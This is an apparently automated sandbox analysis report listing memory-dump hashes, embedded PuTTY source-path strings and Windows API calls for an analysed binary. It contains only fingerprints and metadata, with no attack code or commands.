                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/rsa.c$h->hlen <= MAX_HASH_LEN
                    • API String ID: 0-284240353
                    • Opcode ID: 89178ed16e3c0e246359fff194c19ec3a667f32a05fba68a5d3ee567a0b57344
                    • Instruction ID: d7050c3bafd94b6b5a89d28e1c8f6f9f6953112c74e2ed85bdd0703c06d47827
                    • Opcode Fuzzy Hash: 89178ed16e3c0e246359fff194c19ec3a667f32a05fba68a5d3ee567a0b57344
                    • Instruction Fuzzy Hash: EE4108709083589BCB25EF24E88562FBBE0AF85314F08856DE4DA4B243D731E514DB93
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • ek->curve->type == EC_EDWARDS, xrefs: 00C3274D
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/ecc-ssh.c, xrefs: 00C32748
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/ecc-ssh.c$ek->curve->type == EC_EDWARDS
                    • API String ID: 0-3084317420
                    • Opcode ID: a3538c390a3fdce121e5149f40ccb4aa2e8b78b181835c5c01778eaaa9e0bd17
                    • Instruction ID: 3276ae405dcca2d529293e970fcf2aa529b47563ef2371dc864ec55f16e02468
                    • Opcode Fuzzy Hash: a3538c390a3fdce121e5149f40ccb4aa2e8b78b181835c5c01778eaaa9e0bd17
                    • Instruction Fuzzy Hash: 2231C1B6C04201AFCB10AF51EC82C2AF7E4FF55319F094568F95857362E731AE24DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c, xrefs: 00C18B5B
                    • x0->nw == x1->nw, xrefs: 00C18B60
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c$x0->nw == x1->nw
                    • API String ID: 0-3824505450
                    • Opcode ID: 0a882044438aac3e2726d6ca7c25c9f66bbabf22ffeae728ba0fbc13b961fbe7
                    • Instruction ID: 4b3fb85815d411bc1a9d616f0c315d3f91eb5ba65edde99729219cb503e84262
                    • Opcode Fuzzy Hash: 0a882044438aac3e2726d6ca7c25c9f66bbabf22ffeae728ba0fbc13b961fbe7
                    • Instruction Fuzzy Hash: 020162B5A042029FC724CF18D881E67F7F1FF9A310F284528D45597301C331F895CA95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    • API String ID: 3732870572-0
                    • Opcode ID: 277cbd6a59f8baa4579d44b711721f44710fb65b6825581f9bba46b39bb88784
                    • Instruction ID: bc87d41860479ee9d88c9291306cfcc891d3ab5d736292cffed53694f0401310
                    • Opcode Fuzzy Hash: 277cbd6a59f8baa4579d44b711721f44710fb65b6825581f9bba46b39bb88784
                    • Instruction Fuzzy Hash: 9422E2329183119BD714CF29C84262BB7E1FFD4704F168A2DF998973A1E734E954CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: gj
                    • API String ID: 0-4203073231
                    • Opcode ID: e8b5531b7016f396bd2ad4f8a3cd3829d095cba26c26ff5f70b91c0b749dc6c0
                    • Instruction ID: fe746c293ac68b1537045e96be57369c52289ee8b7a761a3d5b5de6d942410a1
                    • Opcode Fuzzy Hash: e8b5531b7016f396bd2ad4f8a3cd3829d095cba26c26ff5f70b91c0b749dc6c0
                    • Instruction Fuzzy Hash: 7272BEB1A093408FC358CF29C490A5AFBE2BFC8314F59892EE5D9D7351DB71A8548F86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: BlinkCaretTime
                    • String ID:
                    • API String ID: 1096504186-0
                    • Opcode ID: aa1f3ad81b47031ae25355f94a431f7f4b0d729b073be7bd0ab33f655a73b76e
                    • Instruction ID: 41a08fffc240b7fd99e5c7098201b6155f251d48f4567c626f235884a0cc8103
                    • Opcode Fuzzy Hash: aa1f3ad81b47031ae25355f94a431f7f4b0d729b073be7bd0ab33f655a73b76e
                    • Instruction Fuzzy Hash: 10F195759483C4ABEB315F24AC42BED3FD19F51344F1840A9FCCC1A293E6B69A94C762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    • API String ID: 3732870572-0
                    • Opcode ID: 9060bd1cd7ee3a83cec344a5970c80aa5505c246910b6096937bce94f63f22d9
                    • Instruction ID: ed78d0c9564d968be024219d6ac5d585e9a8a80072111d5a330a51834cb10979
                    • Opcode Fuzzy Hash: 9060bd1cd7ee3a83cec344a5970c80aa5505c246910b6096937bce94f63f22d9
                    • Instruction Fuzzy Hash: 5F71FF76614311ABC714CF29CC8162AB3E1EF94710F09C53CE896EB3A1E735E916DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    • API String ID: 3732870572-0
                    • Opcode ID: 10fb34c8d10b20af0a2bc3d776003a001105b226bb41dc61b048fea07b105330
                    • Instruction ID: fff61adc29283385102940bd8721de07c27766938f606db09c206cc77b1fb6be
                    • Opcode Fuzzy Hash: 10fb34c8d10b20af0a2bc3d776003a001105b226bb41dc61b048fea07b105330
                    • Instruction Fuzzy Hash: EA610572A143026BC314DE2DCD8271AB7E5EF94710F89D52DF888EB3A1E675E914C782
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: 7
                    • API String ID: 0-1790921346
                    • Opcode ID: 5d6b7b4cf46ca619f2dafa8658276a86d7c2aca95c07835516d23f083013dcef
                    • Instruction ID: 19006e8ce741daedb65b5aaf778ec21d27d5ad4727df6408a06d76651a997785
                    • Opcode Fuzzy Hash: 5d6b7b4cf46ca619f2dafa8658276a86d7c2aca95c07835516d23f083013dcef
                    • Instruction Fuzzy Hash: 0A024F72A083048BC354DF5ED88065BF7E2BFC8314F5A892DE998C3315DB75E9168A86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C65BD4: RtlAllocateHeap.NTDLL(00000008,?,?,?,00C631F0,00000001,00000364,?,00000006,000000FF,?,00C5D423,00000003,?,?,00BEAE09), ref: 00C65C15
                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C69103
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C691F7
                    • FindClose.KERNEL32(00000000), ref: 00C69236
                    • FindClose.KERNEL32(00000000), ref: 00C69269
                    Similarity
                    • API ID: Find$CloseFile$AllocateFirstHeapNext
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Similarity
                    • API ID:
                    • String ID: 0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C68882
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • EnumSystemLocalesW.KERNEL32(00C6857C,00000001,00000000,?,-00000050,?,00C6836B,00000000,-00000002,00000000,?,00000055,?), ref: 00C68553
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C689A2
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C68798,00000000,00000000,?), ref: 00C68B27
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoCreateInstance.OLE32(00C7E914,00000000,00000001,00C7E904), ref: 00BD4275
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • EnumSystemLocalesW.KERNEL32(00C6882E,00000001,?,?,-00000050,?,00C6832F,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00C68819
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C62FC3: EnterCriticalSection.KERNEL32(?,?,00C643B5,00000000,00CAF5B8,0000000C,00C6436D,?,?,00C65C07,?,?,00C631F0,00000001,00000364,?), ref: 00C62FD2
                    • EnumSystemLocalesW.KERNEL32(00C62EC8,00000001,00CAF4B8,0000000C,00C6262C,-00000050), ref: 00C62F0D
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • EnumSystemLocalesW.KERNEL32(00C6894E,00000001,?,?,?,00C6838D,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00C6893A
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Similarity
                    • API ID: KeyboardState
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00C5BBF5,?,20001004,00000000,00000002,?,?,00C5AB08), ref: 00C627BB
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindResourceA.KERNEL32(00000000,000007D0,000007D0), ref: 00BBB213
                    Similarity
                    • API ID: FindResource
                    • String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c, xrefs: 00C1F215
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Similarity
                    • API ID:
                    • String ID: file format error
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 31dabbd804b79e22d08b453c5bd5c763fba360e1d00ce3ebde3207139512fd18
                    • Instruction ID: bf806d52f23b0bb896984670b3a2a6850a21817e3f6ebdc57dbc7180cd1104e7
                    • Opcode Fuzzy Hash: 31dabbd804b79e22d08b453c5bd5c763fba360e1d00ce3ebde3207139512fd18
                    • Instruction Fuzzy Hash: 27A01230200140CB43008F355A0430D35E8550158070480256006C6060D62484004F01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20f0e32c75a54261df172588fd66ff17c538ca5c1f42e028264228185c16b4b9
                    • Instruction ID: e79ad44f729b3812b51a5ce406cd63498293edc9073328afc7115b8fba930147
                    • Opcode Fuzzy Hash: 20f0e32c75a54261df172588fd66ff17c538ca5c1f42e028264228185c16b4b9
                    • Instruction Fuzzy Hash: 03725FB1A083809FD324DF18D885B9BBBE4AF89314F04492DFA9D97342D734E954CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d2d0734947055704cdfe7d54bf8a3df0cc3e2e7c628da723240298f4e5b72f8f
                    • Instruction ID: 9cfbfc3480245f7a63c4677492c67f5f7ebfd423538976f32a31a6bfb1c00187
                    • Opcode Fuzzy Hash: d2d0734947055704cdfe7d54bf8a3df0cc3e2e7c628da723240298f4e5b72f8f
                    • Instruction Fuzzy Hash: 228227759053198FC320DF4DC880615FBE5FF88328F6AC4AD95989FB12D6B2E9578B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 560852c2bcc00450708f7ce2f025181bde8866cfffd3cc94bab6da74ef015684
                    • Instruction ID: dc7407d94d734804e94efc670f21659045f3bad314a49d976659278978493d40
                    • Opcode Fuzzy Hash: 560852c2bcc00450708f7ce2f025181bde8866cfffd3cc94bab6da74ef015684
                    • Instruction Fuzzy Hash: 954265716042808FD714DF18C488B997BE2FB86318F2849BDE549AF392D7B3AD46CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bfd5cd9bdd4b37e4c268bfe2b63978bf835b5d69f061fad5bf429210c938492
                    • Instruction ID: 5f2b802596122b37c4bffed4c21cac8d1779620710bcb522789f77acc2566a49
                    • Opcode Fuzzy Hash: 5bfd5cd9bdd4b37e4c268bfe2b63978bf835b5d69f061fad5bf429210c938492
                    • Instruction Fuzzy Hash: ED12BF7070C3648BD341EF6EC89052ABBE2EF89601F56492DF6C987352D631EC15DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
                    • Instruction ID: 67023dba6f9e2e3f3fe02310763c822cabce645c56a79c82db1cede863423d72
                    • Opcode Fuzzy Hash: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
                    • Instruction Fuzzy Hash: 843237B0601A41CFCB28CF1AC094A67B7E1FF88324F5587ADE99A4B395D731E854CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 764a698017c6f65b537bd75e40da92c9781e744e754f47fa6fb4680ee3ea6c61
                    • Instruction ID: 1d3340a690464fadcdff7cc4855d1a8df7acd61731d05e39a1560029b8f82d92
                    • Opcode Fuzzy Hash: 764a698017c6f65b537bd75e40da92c9781e744e754f47fa6fb4680ee3ea6c61
                    • Instruction Fuzzy Hash: 9932D1B46047458FC728CF1AC080A56BBF5FF88710F158AADE89A8B751D731E984CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
